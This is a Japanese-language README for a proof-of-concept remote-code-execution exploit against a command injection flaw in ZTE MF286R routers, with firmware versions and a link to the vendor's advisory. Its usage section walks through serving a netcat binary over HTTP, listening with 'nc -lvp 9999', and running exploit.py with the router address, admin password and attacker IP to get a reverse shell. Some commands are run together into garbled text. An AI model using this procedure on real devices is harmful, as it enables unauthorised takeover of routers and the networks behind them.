
ZTE MF286R ルーターに影響するコマンドインジェクションの脆弱性の概念実証コード。RCE エクスプロイトを含みます。
ファームウェア情報:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)この脆弱性は、zte_net_link_detect バイナリと、Webサーバー goahead バイナリ内の WATCH_DOG_SWITCH ハンドラとの間で共有されるコマンドインジェクションです。
この脆弱性は、ルーターがWANに接続されているか、SIMカードを介してインターネットに接続されている場合にのみ悪用可能であることに注意してください。(ppp_status キーの値は ppp_connected、ipv4_ipv6_connected、ipv6_connected のいずれかである必要があります)。
このエクスプロイトのアイデアは、HTTPサーバーから netcat の静的バイナリをダウンロードし、それを使ってリバースシェルを開くことです。 補足: このフォルダに含まれる netcat はビッグエンディアンです。
python3 -m http.server 80809999 でリスニングソケットを開きます nc -lvp 9999python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>この脆弱性は、Andrea Maugeri 氏によって2022年9月に報告されました。 https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664